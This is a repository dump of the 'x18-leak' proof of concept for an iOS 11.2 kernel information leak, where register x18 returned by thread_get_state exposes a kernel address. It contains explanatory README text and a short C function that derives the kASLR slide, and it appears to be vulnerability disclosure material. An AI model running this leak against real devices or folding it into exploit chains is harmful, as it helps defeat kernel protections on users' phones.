├── x18-leak.xcodeproj ├── project.xcworkspace │ └── contents.xcworkspacedata └── project.pbxproj ├── x18-leak ├── ViewController.h ├── AppDelegate.h ├── x18_leak.h ├── main.m ├── ViewController.m ├── Info.plist ├── Base.lproj │ ├── Main.storyboard │ └── LaunchScreen.storyboard ├── Assets.xcassets │ └── AppIcon.appiconset │ │ └── Contents.json ├── AppDelegate.m └── x18_leak.c └── README.md /x18-leak.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /x18-leak/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // x18-leak 4 | // 5 | // Created by Brandon Azad on 2/26/18. 6 | // Copyright © 2018 Brandon Azad. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | 13 | 14 | @end 15 | 16 | -------------------------------------------------------------------------------- /x18-leak/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // x18-leak 4 | // 5 | // Created by Brandon Azad on 2/26/18. 6 | // Copyright © 2018 Brandon Azad. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /x18-leak/x18_leak.h: -------------------------------------------------------------------------------- 1 | #ifndef X18_LEAK__X18_LEAK_H_ 2 | #define X18_LEAK__X18_LEAK_H_ 3 | 4 | #include 5 | 6 | /* 7 | * x18_leak 8 | * 9 | * Description: 10 | * Leak the address of the Lel0_synchronous_vector_64_long kernel function. 11 | * 12 | * Returns: 13 | * The kernel address of Lel0_synchronous_vector_64_long or 0. 14 | */ 15 | uint64_t x18_leak(void); 16 | 17 | #endif 18 | -------------------------------------------------------------------------------- /x18-leak/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // x18-leak 4 | // 5 | // Created by Brandon Azad on 2/26/18. 6 | // Copyright © 2018 Brandon Azad. All rights reserved. 7 | // 8 | 9 | #import 10 | #import "AppDelegate.h" 11 | 12 | int main(int argc, char * argv[]) { 13 | @autoreleasepool { 14 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /x18-leak/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // x18-leak 4 | // 5 | // Created by Brandon Azad on 2/26/18. 6 | // Copyright © 2018 Brandon Azad. All rights reserved. 7 | // 8 | 9 | #import "ViewController.h" 10 | 11 | @interface ViewController () 12 | 13 | @end 14 | 15 | @implementation ViewController 16 | 17 | - (void)viewDidLoad { 18 | [super viewDidLoad]; 19 | // Do any additional setup after loading the view, typically from a nib. 20 | } 21 | 22 | 23 | - (void)didReceiveMemoryWarning { 24 | [super didReceiveMemoryWarning]; 25 | // Dispose of any resources that can be recreated. 26 | } 27 | 28 | 29 | @end 30 | -------------------------------------------------------------------------------- /x18-leak/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /x18-leak/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /x18-leak/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /x18-leak/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "20x20", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "20x20", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "29x29", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "29x29", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "40x40", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "40x40", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "iphone", 35 | "size" : "60x60", 36 | "scale" : "2x" 37 | }, 38 | { 39 | "idiom" : "iphone", 40 | "size" : "60x60", 41 | "scale" : "3x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "20x20", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "20x20", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "29x29", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "29x29", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "idiom" : "ipad", 65 | "size" : "40x40", 66 | "scale" : "1x" 67 | }, 68 | { 69 | "idiom" : "ipad", 70 | "size" : "40x40", 71 | "scale" : "2x" 72 | }, 73 | { 74 | "idiom" : "ipad", 75 | "size" : "76x76", 76 | "scale" : "1x" 77 | }, 78 | { 79 | "idiom" : "ipad", 80 | "size" : "76x76", 81 | "scale" : "2x" 82 | }, 83 | { 84 | "idiom" : "ipad", 85 | "size" : "83.5x83.5", 86 | "scale" : "2x" 87 | } 88 | ], 89 | "info" : { 90 | "version" : 1, 91 | "author" : "xcode" 92 | } 93 | } -------------------------------------------------------------------------------- /x18-leak/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // x18-leak 4 | // 5 | // Created by Brandon Azad on 2/26/18. 6 | // Copyright © 2018 Brandon Azad. All rights reserved. 7 | // 8 | 9 | #import "AppDelegate.h" 10 | 11 | #include "x18_leak.h" 12 | 13 | @interface AppDelegate () 14 | 15 | @end 16 | 17 | @implementation AppDelegate 18 | 19 | 20 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 21 | // Override point for customization after application launch. 22 | printf("Lel0_synchronous_vector_64_long: 0x%016llx\n", x18_leak()); 23 | exit(0); 24 | return YES; 25 | } 26 | 27 | 28 | - (void)applicationWillResignActive:(UIApplication *)application { 29 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 30 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 31 | } 32 | 33 | 34 | - (void)applicationDidEnterBackground:(UIApplication *)application { 35 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 36 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 37 | } 38 | 39 | 40 | - (void)applicationWillEnterForeground:(UIApplication *)application { 41 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 42 | } 43 | 44 | 45 | - (void)applicationDidBecomeActive:(UIApplication *)application { 46 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 47 | } 48 | 49 | 50 | - (void)applicationWillTerminate:(UIApplication *)application { 51 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 52 | } 53 | 54 | 55 | @end 56 | -------------------------------------------------------------------------------- /x18-leak/x18_leak.c: -------------------------------------------------------------------------------- 1 | /* 2 | * x18-leak 3 | * Brandon Azad 4 | * 5 | * 6 | * x18-leak 7 | * ================================================================================================ 8 | * 9 | * In iOS 11.2, Apple introduced a feature on arm64 called __ARM_KERNEL_PROTECT__. According to a 10 | * comment in osfmk/arm64/proc_reg.h: 11 | * 12 | * __ARM_KERNEL_PROTECT__ is a feature intended to guard against potential 13 | * architectural or microarchitectural vulnerabilities that could allow cores to 14 | * read/access EL1-only mappings while in EL0 mode. This is achieved by 15 | * removing as many mappings as possible when the core transitions to EL0 mode 16 | * from EL1 mode, and restoring those mappings when the core transitions to EL1 17 | * mode from EL0 mode. 18 | * 19 | * That is, when transitioning from EL1 (kernel mode) to EL0 (user mode), as many kernel mappings 20 | * as possible will be removed. This should limit the possible attack surface against kernel memory 21 | * mappings when exploiting microarchitectural vulnerabilities like Spectre or Meltdown. 22 | * 23 | * If you look through the diff between XNU versions 4570.20.62 and 4570.31.3, you'll find a number 24 | * of new references to register x18 pop up in the file osfmk/arm64/locore.s in relation to 25 | * __ARM_KERNEL_PROTECT__. In particular, you'll see that the exception vector 26 | * Lel0_synchronous_vector_64, which is the exception vector invoked on a system call (instruction 27 | * "svc #0"), now looks like this: 28 | * 29 | * .text 30 | * .align 7 31 | * Lel0_synchronous_vector_64: 32 | * MAP_KERNEL 33 | * BRANCH_TO_KVA_VECTOR Lel0_synchronous_vector_64_long, 8 34 | * 35 | * The macro BRANCH_TO_KVA_VECTOR is defined as: 36 | * 37 | * .macro BRANCH_TO_KVA_VECTOR 38 | * #if __ARM_KERNEL_PROTECT__ 39 | * /@ 40 | * * Find the kernelcache table for the exception vectors by accessing 41 | * * the per-CPU data. 42 | * @/ 43 | * mrs x18, TPIDR_EL1 44 | * ldr x18, [x18, ACT_CPUDATAP] 45 | * ldr x18, [x18, CPU_EXC_VECTORS] 46 | * 47 | * /@ 48 | * * Get the handler for this exception and jump to it. 49 | * @/ 50 | * ldr x18, [x18, #($1 << 3)] 51 | * br x18 52 | * #else 53 | * b $0 54 | * #endif /@ __ARM_KERNEL_PROTECT__ @/ 55 | * .endmacro 56 | * 57 | * This macro performs an indirect branch to the true exception vector implementation, 58 | * Lel0_synchronous_vector_64_long, by loading a pointer to that function into the register x18. 59 | * Notice, however, that this clobber of x18 happens before the userspace registers are saved by 60 | * the function fleh_dispatch64, which is called by Lel0_synchronous_vector_64_long. This means 61 | * that when the user registers are saved, x18 will actually be a pointer to 62 | * Lel0_synchronous_vector_64_long rather than the original value from userspace. 63 | * 64 | * Even though x18 is cleared on exception return, storing a kernel pointer in the user register 65 | * state is problematic because thread_get_state() can be used to copy the saved user register 66 | * state back to userspace, including the value of register x18. All a thread needs to do in order 67 | * to obtain the address of the Lel0_synchronous_vector_64_long function is call thread_get_state() 68 | * on itself and look at the reported value of x18. This makes it trivial to determine the kASLR 69 | * slide by subtracting the value of x18 thus obtained by the static address of 70 | * Lel0_synchronous_vector_64_long. 71 | * 72 | */ 73 | #include "x18_leak.h" 74 | 75 | #include 76 | 77 | uint64_t 78 | x18_leak() { 79 | mach_port_t thread = mach_thread_self(); 80 | arm_thread_state64_t state; 81 | mach_msg_type_number_t count = ARM_THREAD_STATE64_COUNT; 82 | kern_return_t kr = thread_get_state(thread, ARM_THREAD_STATE64, 83 | (thread_state_t) &state, &count); 84 | mach_port_deallocate(mach_task_self(), thread); 85 | if (kr != KERN_SUCCESS) { 86 | return 0; 87 | } 88 | if ((state.__x[18] & 0xffffffff00000000) != 0xfffffff000000000) { 89 | return 0; 90 | } 91 | return state.__x[18]; 92 | } 93 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | x18-leak 2 | =================================================================================================== 3 | 4 | iOS 11.2 introduced a kernel information leak that could be used to determine the kASLR slide. The 5 | issue was the result of a newly added feature, `__ARM_KERNEL_PROTECT__`, that inadvertently caused 6 | the address of the kernel function `Lel0_synchronous_vector_64_long` to appear in register `x18` 7 | when obtaining the values of a thread's registers using `thread_get_state`. The issue was 8 | discovered when kernel pointers started appearing in iOS application crash logs. 9 | 10 | 11 | The vulnerability 12 | --------------------------------------------------------------------------------------------------- 13 | 14 | In iOS 11.2, Apple introduced a feature on arm64 called `__ARM_KERNEL_PROTECT__`. According to a 15 | comment in [`osfmk/arm64/proc_reg.h`][proc_reg.h]: 16 | 17 | [proc_reg.h]: https://opensource.apple.com/source/xnu/xnu-4570.31.3/osfmk/arm64/proc_reg.h.auto.html 18 | 19 | __ARM_KERNEL_PROTECT__ is a feature intended to guard against potential 20 | architectural or microarchitectural vulnerabilities that could allow cores to 21 | read/access EL1-only mappings while in EL0 mode. This is achieved by 22 | removing as many mappings as possible when the core transitions to EL0 mode 23 | from EL1 mode, and restoring those mappings when the core transitions to EL1 24 | mode from EL0 mode. 25 | 26 | That is, when transitioning from EL1 (kernel mode) to EL0 (user mode), as many kernel mappings as 27 | possible will be removed. This should limit the possible attack surface against kernel memory 28 | mappings when exploiting microarchitectural vulnerabilities like Spectre or Meltdown. 29 | 30 | If you look through the diff between XNU versions 4570.20.62 and 4570.31.3, you'll find a number of 31 | new references to register `x18` pop up in the file [`osfmk/arm64/locore.s`][XNU 4570.31.3 32 | locore.s] in relation to `__ARM_KERNEL_PROTECT__`. In particular, you'll see that the exception 33 | vector `Lel0_synchronous_vector_64`, which is the exception vector invoked on a system call 34 | (instruction `svc #0`), now looks like this: 35 | 36 | [XNU 4570.31.3 locore.s]: https://opensource.apple.com/source/xnu/xnu-4570.31.3/osfmk/arm64/locore.s.auto.html 37 | 38 | ```assembly 39 | .text 40 | .align 7 41 | Lel0_synchronous_vector_64: 42 | MAP_KERNEL 43 | BRANCH_TO_KVA_VECTOR Lel0_synchronous_vector_64_long, 8 44 | ``` 45 | 46 | The macro `BRANCH_TO_KVA_VECTOR` is defined as: 47 | 48 | ```assembly 49 | .macro BRANCH_TO_KVA_VECTOR 50 | #if __ARM_KERNEL_PROTECT__ 51 | /* 52 | * Find the kernelcache table for the exception vectors by accessing 53 | * the per-CPU data. 54 | */ 55 | mrs x18, TPIDR_EL1 56 | ldr x18, [x18, ACT_CPUDATAP] 57 | ldr x18, [x18, CPU_EXC_VECTORS] 58 | 59 | /* 60 | * Get the handler for this exception and jump to it. 61 | */ 62 | ldr x18, [x18, #($1 << 3)] 63 | br x18 64 | #else 65 | b $0 66 | #endif /* __ARM_KERNEL_PROTECT__ */ 67 | .endmacro 68 | ``` 69 | 70 | This macro performs an indirect branch to the true exception vector implementation, 71 | `Lel0_synchronous_vector_64_long`, by loading a pointer to that function into the register `x18`. 72 | Notice, however, that this clobber of `x18` happens before the userspace registers are saved by the 73 | function `fleh_dispatch64`, which is called by `Lel0_synchronous_vector_64_long`. This means that 74 | when the user registers are saved, `x18` will actually be a pointer to 75 | `Lel0_synchronous_vector_64_long` rather than the original value from userspace. 76 | 77 | Even though `x18` is cleared on exception return, storing a kernel pointer in the user register 78 | state is problematic because `thread_get_state` can be used to copy the saved user register state 79 | back to userspace, including the value of register `x18`. All a thread needs to do in order to 80 | obtain the address of the `Lel0_synchronous_vector_64_long` function is call `thread_get_state` on 81 | itself and look at the reported value of `x18`. This makes it trivial to determine the kASLR slide 82 | by subtracting the value of `x18` thus obtained by the static address of 83 | `Lel0_synchronous_vector_64_long`. 84 | 85 | 86 | Exploitation 87 | --------------------------------------------------------------------------------------------------- 88 | 89 | As mentioned above, exploitation is trivial: simply call the function `thread_get_state`, look at 90 | the value for register `x18`, and subtract from it the static address of the kernel function 91 | `Lel0_synchronous_vector_64_long`. 92 | 93 | 94 | Discovery 95 | --------------------------------------------------------------------------------------------------- 96 | 97 | I discovered this issue on February 26, 2018, after noticing a kernel pointer in register `x18` of 98 | an iOS application crash log. A quick check showed that the same value appeared in register `x18` 99 | of every crash log on the device, which suggested a serious information leak. 100 | 101 | I next tried to determine what exactly was going on with register `x18` through experimentation. I 102 | set a breakpoint in an empty iOS app and used lldb to read the value of register `x18`, confirming 103 | that the leak was not restricted to crashing applications. Next I tried to read the value of `x18` 104 | using inline assembly and found that the value obtained did not match the value shown by the 105 | debugger when using a command like `reg read x18`. This suggested that perhaps the leak was really 106 | in `thread_get_state`, and that register `x18` didn't truly contain a kernel pointer while the CPU 107 | was executing in userspace. A quick proof-of-concept that read the value of `x18` using 108 | `thread_get_state` confirmed that this function was indeed the source of the leak. 109 | 110 | 111 | Timeline 112 | --------------------------------------------------------------------------------------------------- 113 | 114 | I reported the issue to Apple on February 26, 2018, the same day I discovered it. 115 | 116 | 117 | --------------------------------------------------------------------------------------------------- 118 | By Brandon Azad 119 | -------------------------------------------------------------------------------- /x18-leak.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 48; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | 5544C58A2044E23F006514D9 /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = 5544C5892044E23F006514D9 /* AppDelegate.m */; }; 11 | 5544C58D2044E23F006514D9 /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 5544C58C2044E23F006514D9 /* ViewController.m */; }; 12 | 5544C5902044E23F006514D9 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 5544C58E2044E23F006514D9 /* Main.storyboard */; }; 13 | 5544C5922044E23F006514D9 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 5544C5912044E23F006514D9 /* Assets.xcassets */; }; 14 | 5544C5952044E23F006514D9 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 5544C5932044E23F006514D9 /* LaunchScreen.storyboard */; }; 15 | 5544C5982044E240006514D9 /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = 5544C5972044E240006514D9 /* main.m */; }; 16 | 5544C5A02044E2C6006514D9 /* x18_leak.c in Sources */ = {isa = PBXBuildFile; fileRef = 5544C59F2044E2C6006514D9 /* x18_leak.c */; }; 17 | /* End PBXBuildFile section */ 18 | 19 | /* Begin PBXFileReference section */ 20 | 5544C5852044E23F006514D9 /* x18-leak.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = "x18-leak.app"; sourceTree = BUILT_PRODUCTS_DIR; }; 21 | 5544C5882044E23F006514D9 /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; 22 | 5544C5892044E23F006514D9 /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; 23 | 5544C58B2044E23F006514D9 /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = ""; }; 24 | 5544C58C2044E23F006514D9 /* ViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; 25 | 5544C58F2044E23F006514D9 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; 26 | 5544C5912044E23F006514D9 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 27 | 5544C5942044E23F006514D9 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; 28 | 5544C5962044E240006514D9 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; 29 | 5544C5972044E240006514D9 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; 30 | 5544C59E2044E2C6006514D9 /* x18_leak.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = x18_leak.h; sourceTree = ""; }; 31 | 5544C59F2044E2C6006514D9 /* x18_leak.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = x18_leak.c; sourceTree = ""; }; 32 | /* End PBXFileReference section */ 33 | 34 | /* Begin PBXFrameworksBuildPhase section */ 35 | 5544C5822044E23F006514D9 /* Frameworks */ = { 36 | isa = PBXFrameworksBuildPhase; 37 | buildActionMask = 2147483647; 38 | files = ( 39 | ); 40 | runOnlyForDeploymentPostprocessing = 0; 41 | }; 42 | /* End PBXFrameworksBuildPhase section */ 43 | 44 | /* Begin PBXGroup section */ 45 | 5544C57C2044E23F006514D9 = { 46 | isa = PBXGroup; 47 | children = ( 48 | 5544C5872044E23F006514D9 /* x18-leak */, 49 | 5544C5862044E23F006514D9 /* Products */, 50 | ); 51 | sourceTree = ""; 52 | }; 53 | 5544C5862044E23F006514D9 /* Products */ = { 54 | isa = PBXGroup; 55 | children = ( 56 | 5544C5852044E23F006514D9 /* x18-leak.app */, 57 | ); 58 | name = Products; 59 | sourceTree = ""; 60 | }; 61 | 5544C5872044E23F006514D9 /* x18-leak */ = { 62 | isa = PBXGroup; 63 | children = ( 64 | 5544C5882044E23F006514D9 /* AppDelegate.h */, 65 | 5544C5892044E23F006514D9 /* AppDelegate.m */, 66 | 5544C58B2044E23F006514D9 /* ViewController.h */, 67 | 5544C58C2044E23F006514D9 /* ViewController.m */, 68 | 5544C58E2044E23F006514D9 /* Main.storyboard */, 69 | 5544C5912044E23F006514D9 /* Assets.xcassets */, 70 | 5544C5932044E23F006514D9 /* LaunchScreen.storyboard */, 71 | 5544C5962044E240006514D9 /* Info.plist */, 72 | 5544C5972044E240006514D9 /* main.m */, 73 | 5544C59E2044E2C6006514D9 /* x18_leak.h */, 74 | 5544C59F2044E2C6006514D9 /* x18_leak.c */, 75 | ); 76 | path = "x18-leak"; 77 | sourceTree = ""; 78 | }; 79 | /* End PBXGroup section */ 80 | 81 | /* Begin PBXNativeTarget section */ 82 | 5544C5842044E23F006514D9 /* x18-leak */ = { 83 | isa = PBXNativeTarget; 84 | buildConfigurationList = 5544C59B2044E240006514D9 /* Build configuration list for PBXNativeTarget "x18-leak" */; 85 | buildPhases = ( 86 | 5544C5812044E23F006514D9 /* Sources */, 87 | 5544C5822044E23F006514D9 /* Frameworks */, 88 | 5544C5832044E23F006514D9 /* Resources */, 89 | ); 90 | buildRules = ( 91 | ); 92 | dependencies = ( 93 | ); 94 | name = "x18-leak"; 95 | productName = "x18-leak"; 96 | productReference = 5544C5852044E23F006514D9 /* x18-leak.app */; 97 | productType = "com.apple.product-type.application"; 98 | }; 99 | /* End PBXNativeTarget section */ 100 | 101 | /* Begin PBXProject section */ 102 | 5544C57D2044E23F006514D9 /* Project object */ = { 103 | isa = PBXProject; 104 | attributes = { 105 | LastUpgradeCheck = 0920; 106 | ORGANIZATIONNAME = "Brandon Azad"; 107 | TargetAttributes = { 108 | 5544C5842044E23F006514D9 = { 109 | CreatedOnToolsVersion = 9.2; 110 | ProvisioningStyle = Automatic; 111 | }; 112 | }; 113 | }; 114 | buildConfigurationList = 5544C5802044E23F006514D9 /* Build configuration list for PBXProject "x18-leak" */; 115 | compatibilityVersion = "Xcode 8.0"; 116 | developmentRegion = en; 117 | hasScannedForEncodings = 0; 118 | knownRegions = ( 119 | en, 120 | Base, 121 | ); 122 | mainGroup = 5544C57C2044E23F006514D9; 123 | productRefGroup = 5544C5862044E23F006514D9 /* Products */; 124 | projectDirPath = ""; 125 | projectRoot = ""; 126 | targets = ( 127 | 5544C5842044E23F006514D9 /* x18-leak */, 128 | ); 129 | }; 130 | /* End PBXProject section */ 131 | 132 | /* Begin PBXResourcesBuildPhase section */ 133 | 5544C5832044E23F006514D9 /* Resources */ = { 134 | isa = PBXResourcesBuildPhase; 135 | buildActionMask = 2147483647; 136 | files = ( 137 | 5544C5952044E23F006514D9 /* LaunchScreen.storyboard in Resources */, 138 | 5544C5922044E23F006514D9 /* Assets.xcassets in Resources */, 139 | 5544C5902044E23F006514D9 /* Main.storyboard in Resources */, 140 | ); 141 | runOnlyForDeploymentPostprocessing = 0; 142 | }; 143 | /* End PBXResourcesBuildPhase section */ 144 | 145 | /* Begin PBXSourcesBuildPhase section */ 146 | 5544C5812044E23F006514D9 /* Sources */ = { 147 | isa = PBXSourcesBuildPhase; 148 | buildActionMask = 2147483647; 149 | files = ( 150 | 5544C5A02044E2C6006514D9 /* x18_leak.c in Sources */, 151 | 5544C58D2044E23F006514D9 /* ViewController.m in Sources */, 152 | 5544C5982044E240006514D9 /* main.m in Sources */, 153 | 5544C58A2044E23F006514D9 /* AppDelegate.m in Sources */, 154 | ); 155 | runOnlyForDeploymentPostprocessing = 0; 156 | }; 157 | /* End PBXSourcesBuildPhase section */ 158 | 159 | /* Begin PBXVariantGroup section */ 160 | 5544C58E2044E23F006514D9 /* Main.storyboard */ = { 161 | isa = PBXVariantGroup; 162 | children = ( 163 | 5544C58F2044E23F006514D9 /* Base */, 164 | ); 165 | name = Main.storyboard; 166 | sourceTree = ""; 167 | }; 168 | 5544C5932044E23F006514D9 /* LaunchScreen.storyboard */ = { 169 | isa = PBXVariantGroup; 170 | children = ( 171 | 5544C5942044E23F006514D9 /* Base */, 172 | ); 173 | name = LaunchScreen.storyboard; 174 | sourceTree = ""; 175 | }; 176 | /* End PBXVariantGroup section */ 177 | 178 | /* Begin XCBuildConfiguration section */ 179 | 5544C5992044E240006514D9 /* Debug */ = { 180 | isa = XCBuildConfiguration; 181 | buildSettings = { 182 | ALWAYS_SEARCH_USER_PATHS = NO; 183 | CLANG_ANALYZER_NONNULL = YES; 184 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 185 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 186 | CLANG_CXX_LIBRARY = "libc++"; 187 | CLANG_ENABLE_MODULES = YES; 188 | CLANG_ENABLE_OBJC_ARC = YES; 189 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 190 | CLANG_WARN_BOOL_CONVERSION = YES; 191 | CLANG_WARN_COMMA = YES; 192 | CLANG_WARN_CONSTANT_CONVERSION = YES; 193 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 194 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 195 | CLANG_WARN_EMPTY_BODY = YES; 196 | CLANG_WARN_ENUM_CONVERSION = YES; 197 | CLANG_WARN_INFINITE_RECURSION = YES; 198 | CLANG_WARN_INT_CONVERSION = YES; 199 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 200 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 201 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 202 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 203 | CLANG_WARN_STRICT_PROTOTYPES = YES; 204 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 205 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 206 | CLANG_WARN_UNREACHABLE_CODE = YES; 207 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 208 | CODE_SIGN_IDENTITY = "iPhone Developer"; 209 | COPY_PHASE_STRIP = NO; 210 | DEBUG_INFORMATION_FORMAT = dwarf; 211 | ENABLE_STRICT_OBJC_MSGSEND = YES; 212 | ENABLE_TESTABILITY = YES; 213 | GCC_C_LANGUAGE_STANDARD = gnu11; 214 | GCC_DYNAMIC_NO_PIC = NO; 215 | GCC_NO_COMMON_BLOCKS = YES; 216 | GCC_OPTIMIZATION_LEVEL = 0; 217 | GCC_PREPROCESSOR_DEFINITIONS = ( 218 | "DEBUG=1", 219 | "$(inherited)", 220 | ); 221 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 222 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 223 | GCC_WARN_UNDECLARED_SELECTOR = YES; 224 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 225 | GCC_WARN_UNUSED_FUNCTION = YES; 226 | GCC_WARN_UNUSED_VARIABLE = YES; 227 | IPHONEOS_DEPLOYMENT_TARGET = 11.2; 228 | MTL_ENABLE_DEBUG_INFO = YES; 229 | ONLY_ACTIVE_ARCH = YES; 230 | SDKROOT = iphoneos; 231 | }; 232 | name = Debug; 233 | }; 234 | 5544C59A2044E240006514D9 /* Release */ = { 235 | isa = XCBuildConfiguration; 236 | buildSettings = { 237 | ALWAYS_SEARCH_USER_PATHS = NO; 238 | CLANG_ANALYZER_NONNULL = YES; 239 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 240 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 241 | CLANG_CXX_LIBRARY = "libc++"; 242 | CLANG_ENABLE_MODULES = YES; 243 | CLANG_ENABLE_OBJC_ARC = YES; 244 | 